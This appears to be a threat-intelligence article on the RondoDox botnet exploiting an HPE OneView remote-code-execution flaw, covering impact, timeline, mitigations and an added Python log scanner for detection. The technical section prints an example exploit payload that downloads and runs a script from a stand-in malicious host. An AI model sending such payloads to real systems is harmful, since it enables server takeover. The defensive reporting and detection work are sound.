
RondoDox Botnet Mass-Exploits Critical HPE OneView RCE (CVE-2025-37164)

Check Point Research confirms that the RondoDox botnet is actively exploiting CVE-2025-37164, a critical unauthenticated RCE in HPE OneView. Tens of thousands of attempts have been blocked, forcing immediate patching and network-segmentation actions.

Overview

On January 7, 2026, Check Point Research disclosed an active, large-scale exploitation campaign targeting CVE-2025-37164, a critical remote code execution (RCE) flaw in Hewlett Packard Enterprise’s (HPE) OneView management platform. The campaign is being driven by the RondoDox botnet, a known IoT-focused malware family that has recently pivoted to high-value infrastructure services. Within a single four-hour window, Check Point observed more than 40,000 exploitation attempts, many of which were automatically blocked by its Quantum Intrusion Prevention System (IPS).

Technical Details

The vulnerability resides in the executeCommand REST API endpoint tied to the id-pools functionality of HPE OneView. The endpoint accepts a JSON payload containing a command field and forwards the value directly to the underlying operating system without any authentication or authorization checks. An attacker can therefore inject arbitrary shell commands and achieve full system compromise.

  • CVE Identifier: CVE-2025-37164
  • CVSS v3.1 Base Score: 9.8 (Critical)
  • Published: 16 Dec 2025 (HPE advisory)
  • Affected Products: All HPE OneView appliances (on-premises and cloud-connected) running versions prior to the December 2025 security patch.

RondoDox exploits the flaw by sending a crafted HTTP POST request to /rest/id-pools/executeCommand with a payload such as:

  {
    "command": "wget http://malicious.example.com/payload.sh -O /tmp/payload.sh && sh /tmp/payload.sh"
  }

The botnet’s HTTP client identifies itself with a unique User-Agent string (e.g., RondoDox/2.1 (+https://rondodox.io)) that allowed Check Point to attribute the traffic to the malware family. After successful command execution, the payload typically installs a second-stage loader that connects back to C2 servers for further instructions, such as credential harvesting, lateral movement, or cryptocurrency mining.

Impact Analysis

Because OneView is the central point for managing compute, storage, and networking resources, an RCE on the appliance gives an adversary complete control over the data-center fabric. Potential impacts include:

  • Full takeover of server provisioning workflows.
  • Extraction or manipulation of sensitive configuration data (e.g., VLANs, SAN zoning).
  • Deployment of ransomware or destructive scripts across managed devices.
  • Persistence through creation of rogue admin accounts or back-door services.

Industries with heavy reliance on HPE infrastructure (government, financial services, manufacturing, and cloud service providers) have reported the highest volume of attacks. The United States, Australia, France, Germany, and Austria are the primary geographic sources of observed attempts.

Timeline of Events

  • 16 Dec 2025 - HPE releases advisory for CVE-2025-37164.
  • 21 Dec 2025 - Check Point deploys emergency IPS signatures for the vulnerability.
  • 21 Dec 2025 (evening) - First exploitation attempts detected in Check Point telemetry.
  • 07 Jan 2026 (05:45 UTC) - Spike to >40,000 automated attempts within 4 hours.
  • 07 Jan 2026 - Check Point reports activity to CISA; CVE added to the KEV catalog.
  • 08 Jan 2026 onward - Ongoing monitoring shows a steady stream of low-volume probing, indicating that the botnet is maintaining a foothold.

Mitigation & Recommendations

Organizations should act immediately. The following steps are proven to reduce exposure:

  1. Patch Now: Apply HPE’s December 2025 security update (or any later cumulative release) that validates input on the executeCommand endpoint.
  2. Network Segmentation: Isolate OneView appliances on a dedicated management VLAN with strict ACLs; block inbound traffic to port 443 from any untrusted network.
  3. IPS/IDS Rules: Deploy signatures that detect the distinctive User-Agent and the characteristic JSON command payload. Check Point’s public IPS rule set can be imported directly.
  4. Log Monitoring: Enable detailed request logging on OneView and forward logs to a SIEM. Look for anomalous POST requests to /rest/id-pools/executeCommand from unknown IPs.
  5. IOC Hunting: Search for known RondoDox indicators (hashes, C2 domains, the Dutch IP 185.30.208.112) across endpoints and network traffic.
  6. Credential Hygiene: Rotate any service accounts that may have been created post-compromise and enforce MFA on privileged consoles.

For organizations that cannot patch immediately, a temporary mitigation is to disable the id-pools API via the OneView configuration interface or a reverse-proxy rule that returns HTTP 403 for the endpoint.
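The log-monitoring and IPS steps above (items 3 and 4) can be prototyped against OneView or reverse-proxy access logs with a short scanner. The code below is an added example, not part of the original report or any Check Point or HPE tooling; the log lines, the KNOWN_ADMIN_SOURCES allowlist and the Combined Log Format layout are constructed assumptions.

```python
import re
from collections import Counter

# Constructed sample access-log lines (Combined Log Format); not real telemetry.
SAMPLE_LOG = """\
10.0.5.21 - - [07/Jan/2026:05:46:02 +0000] "POST /rest/id-pools/executeCommand HTTP/1.1" 200 153 "-" "RondoDox/2.1 (+https://rondodox.io)"
10.0.5.8 - - [07/Jan/2026:05:46:10 +0000] "GET /rest/version HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.5.21 - - [07/Jan/2026:05:46:15 +0000] "POST /rest/id-pools/executeCommand HTTP/1.1" 403 0 "-" "RondoDox/2.1 (+https://rondodox.io)"
10.0.7.3 - - [07/Jan/2026:05:47:01 +0000] "POST /rest/id-pools/executeCommand HTTP/1.1" 200 153 "-" "curl/8.4.0"
10.0.5.8 - - [07/Jan/2026:05:47:30 +0000] "POST /rest/login-sessions HTTP/1.1" 200 312 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TARGET_PATH = "/rest/id-pools/executeCommand"       # endpoint from the advisory
RONDODOX_UA = re.compile(r"^RondoDox/", re.I)      # User-Agent prefix reported by Check Point
KNOWN_ADMIN_SOURCES = {"10.0.5.8"}                 # assumed allowlist of management hosts

def parse_line(line):
    """Parse one Combined Log Format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return finding tags for one parsed entry; an empty list means nothing notable."""
    tags = []
    if entry["method"] == "POST" and entry["path"] == TARGET_PATH:
        tags.append("executeCommand-post")
        if entry["status"].startswith("2"):        # 2xx means the appliance accepted it
            tags.append("executeCommand-succeeded")
        if entry["ip"] not in KNOWN_ADMIN_SOURCES:  # the "unknown IP" condition from item 4
            tags.append("unknown-source")
    if RONDODOX_UA.match(entry["ua"]):
        tags.append("rondodox-ua")
    return tags

def scan(log_text):
    """Run classify() over every parseable line and keep only lines with findings."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "status": entry["status"], "tags": tags})
    return findings

def summarize(findings):
    """Count executeCommand POST attempts per source IP for triage."""
    return Counter(f["ip"] for f in findings if "executeCommand-post" in f["tags"])
```

Note that the third finding is a successful POST from an unknown source with an ordinary curl User-Agent: the User-Agent signature alone would miss it, so the endpoint-plus-source condition is the one to alert on.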

Real-World Impact

Early reports from a U.S. federal agency indicate that an exploited OneView instance was used to re-image hundreds of servers with a malicious OS image, causing a week-long outage. A European financial services firm discovered unauthorized VLAN changes that allowed attackers to sniff inter-departmental traffic. In both cases, the root cause was the unpatched CVE-2025-37164.

These incidents illustrate that supply-chain management platforms, once considered “behind the firewall”, are now prime targets for botnets seeking high-value footholds. The RondoDox campaign demonstrates a shift from traditional DDoS-oriented attacks to sophisticated, persistence-focused exploitation.

Expert Opinion

From a strategic standpoint, the rapid weaponization of CVE-2025-37164 underscores three industry-wide lessons:

  • Infrastructure-as-Software is a Hard Target: Management APIs are increasingly exposed to internal networks that are themselves compromised. Organizations must treat these services with the same rigor as public-facing applications.
  • Botnet Evolution: RondoDox’s pivot from IoT DDoS attacks to high-impact RCE exploits signals a maturation of botnet capabilities. Expect more “hybrid” botnets that combine mass-scale scanning with targeted exploitation.
  • KEV Catalog Effectiveness: The addition of CVE-2025-37164 to the CISA Known Exploited Vulnerabilities list accelerated patch adoption for many enterprises. Continued collaboration between vendors, researchers, and government agencies is essential to shorten the window of exposure.

In short, the RondoDox campaign is a wake-up call: supply-chain hardware management platforms must be incorporated into regular Red-Team assessments, and their API surfaces should be continuously hardened.